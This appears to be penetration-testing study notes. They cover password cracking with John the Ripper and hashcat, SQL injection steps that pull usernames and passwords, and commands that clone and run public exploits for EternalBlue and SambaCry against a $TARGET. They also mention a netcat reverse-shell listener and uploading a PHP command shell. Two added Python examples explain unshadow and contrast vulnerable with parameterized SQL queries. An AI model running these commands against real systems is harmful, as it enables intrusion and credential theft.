unshadow passwd.txt shadow.txt > unshadow.txt
john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
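To make the merged file format visible, here is an added example (not part of the original notes, and not John the Ripper's own code) that re-implements what `unshadow` does in Python: every /etc/passwd entry is kept, and the `x` placeholder in the second field is replaced with the hash from the matching /etc/shadow entry. The sample lines and hash strings are constructed placeholders. The `crackable_entries` helper is an addition beyond `unshadow` itself: it shows which merged entries actually carry a hash, which is what an auditor needs to know before running a wordlist against the file.

```python
# Added example: minimal re-implementation of unshadow(8) plus a filter
# for entries that carry a real hash. Sample data below is constructed;
# the $6$ hash is a placeholder, not a real sha512crypt value.

PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "svc:x:1001:1001::/home/svc:/bin/sh",
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin",
]
SHADOW_LINES = [
    "root:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:19000:0:99999:7:::",
    "svc:!:19000:0:99999:7:::",        # locked account: no crackable hash
    "nobody:*:19000:0:99999:7:::",     # no password set
]


def parse_shadow(lines):
    """Map username -> hash field (field 2 of the 9-field shadow format)."""
    hashes = {}
    for line in lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) < 2 or not fields[0]:
            continue  # blank or malformed line
        hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_lines, shadow_lines):
    """Merge like unshadow(8): keep every 7-field passwd entry and replace
    field 2 with the shadow hash when the user has a shadow entry."""
    hashes = parse_shadow(shadow_lines)
    merged = []
    for line in passwd_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) != 7:
            continue  # malformed passwd entry
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable_entries(merged_lines):
    """Entries whose hash field is a real hash: not locked ('!'), not
    disabled ('*'), not empty, and not an unresolved 'x' placeholder."""
    out = []
    for line in merged_lines:
        h = line.split(":")[1]
        if h and h != "x" and not h.startswith(("!", "*")):
            out.append(line)
    return out


if __name__ == "__main__":
    merged = unshadow(PASSWD_LINES, SHADOW_LINES)
    for line in merged:
        print(line)
    print("entries with a crackable hash:", len(crackable_entries(merged)))
```

Run it to see that only the root line ends up with a hash in field 2; the locked and passwordless accounts are carried through unchanged, exactly as the real tool does, and would be wasted effort in a wordlist run.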
Password-protected RAR files.
Hashcat
Hash modes (-m):
SHA256: 1400
SHA512: 1800
RAR5: 13000
Attack modes (-a):
Dictionary: 0
Local File Inclusions
Find a way to upload a PHP command shell.
MS09-050
CVE-2009-3103: SMBv2 Command Value Vulnerability
This vulnerability impacts Windows Server 2008 SP1 32-bit as well as Windows Vista SP1/SP2 and Windows 7.
EternalBlue
CVE-2017-0144
This vulnerability impacts Windows. Exploiting it requires access to a Named Pipe (NOTE: Windows Vista and newer do not allow anonymous access to Named Pipes).
SambaCry
CVE-2017-7494
Exploiting this vulnerability depends on your ability to write to a share. Download Proof-of-Concept code from joxeankoret and modify as desired.
An example of a modified implant.c file. This source file gets compiled by the provided Python script.
My example payload sends two ICMP packets to my computer, so the command below is needed to confirm the exploit worked. If you included a reverse shell instead, you would run something like sudo nc -nvlp 443.
Run the exploit.
ShellShock via SMTP
CVE-2014-6271
Shell via Samba Logon Command
SQL Injection
Check for a SQLi vulnerability
Check the quality of SQLi vulnerability
Get the number of columns of a table (increment the number until there is an error; for example, if 4 triggers an error, there are 3 columns).
Get all table names (look for user/admin tables).
Get all possible column names within the entire database (look for values like "username" and "password").
Get usernames and passwords from the users table.
Get usernames and passwords from the admins table.
Get the database software version.
Get the database service account name.
Execute a database function (ex: user(), database(), etc.).
Execute shell command (ex: find current working directory).
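The column-counting step above only works because the application pastes user input into the SQL text. The following added example (not from the original notes) shows that defect beside its fix, using an in-memory SQLite database with a constructed users table so it runs offline. The same probe is run against a concatenated query and against a parameterized one: the first errors out once the ORDER BY index exceeds the real column count (which is what leaks the count), the second never errors because the driver binds the value as data. The `count_columns_by_probe` and `quote_handling` helpers are written here as regression checks a developer can keep in a test suite.

```python
import sqlite3

# Added example: vulnerable string-built query next to a parameterized one,
# with the notes' column-counting probe turned into a regression check.
# The users table and its rows are constructed sample data.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "hash-a"), (2, "bob", "hash-b"), (3, "o'brien", "hash-c")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """String concatenation: the input is parsed as SQL, so quotes and
    keywords inside it change the statement. This is the defect."""
    sql = "SELECT id, username, password FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameter binding: the value travels separately from the SQL text
    and is never parsed as SQL, whatever characters it contains."""
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def count_columns_by_probe(lookup, conn, max_n=10):
    """Regression check for the column-counting step: raise the ORDER BY
    index until the database errors. Returns the inferred column count,
    or None when no probe value ever errors (the lookup treated every
    probe as plain data, which is the result you want)."""
    for n in range(1, max_n + 1):
        try:
            lookup(conn, "' ORDER BY %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def quote_handling(lookup, conn):
    """Does the lookup find the legitimate user o'brien, or choke on the
    apostrophe? Returns the matched usernames, or "error"."""
    try:
        return [row[1] for row in lookup(conn, "o'brien")]
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        print("%-10s columns leaked: %s | o'brien -> %s"
              % (name, count_columns_by_probe(fn, conn), quote_handling(fn, conn)))
```

Note that the vulnerable version also fails on a perfectly legitimate username containing an apostrophe, while the parameterized version returns the row; the correctness bug and the injection bug have the same root cause and the same fix.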
Common Oracle-based SQL Query Errors

| ID | Error | Explanation |
| --- | --- | --- |
| ORA-00923 | FROM keyword not found where expected | A SELECT or REVOKE statement lacks a FROM keyword in its correct form and place: FROM is misspelled, misplaced, or missing. In Oracle, FROM must follow the last selected item in a SELECT statement or, in a REVOKE statement, the privileges. |
| ORA-00933 | SQL command not properly ended | The SQL statement ends with an inappropriate clause. Correct the syntax by removing the inappropriate clauses. |
| ORA-00936 | Missing expression | Part of the statement is missing. This happens easily; the two most common cases are missing information in a SELECT statement and an omitted FROM clause. |
| ORA-01785 | ORDER BY item must be the number of a SELECT-list expression | |
| ORA-01789 | Query block has incorrect number of result columns | |
| ORA-01790 | Expression must have same datatype as corresponding expression | Rewrite the SELECT statement so that each matching column has the same data type. Try replacing the columns with null: for example, if you only want to see table_name and the output has 3 columns, use "table_name,null,null" rather than "table_name,2,3". |
EternalBlue (MS17-010) commands referenced above:
git clone https://github.com/worawit/MS17-010
cd MS17-010
pip install impacket # mysmb.py ships with this exploit. OffSec also hosts it on their GitHub
python checker.py $TARGET # check if target is vulnerable and find an accessible Named Pipe
python zzz_exploit.py $TARGET $NAMED_PIPE
SambaCry (CVE-2017-7494) setup commands referenced above:
mkdir exploits
cd exploits
git clone https://github.com/joxeankoret/CVE-2017-7494.git
cd CVE-2017-7494
mv implant.c implant.bak # keep the original implant for reference
vim implant.c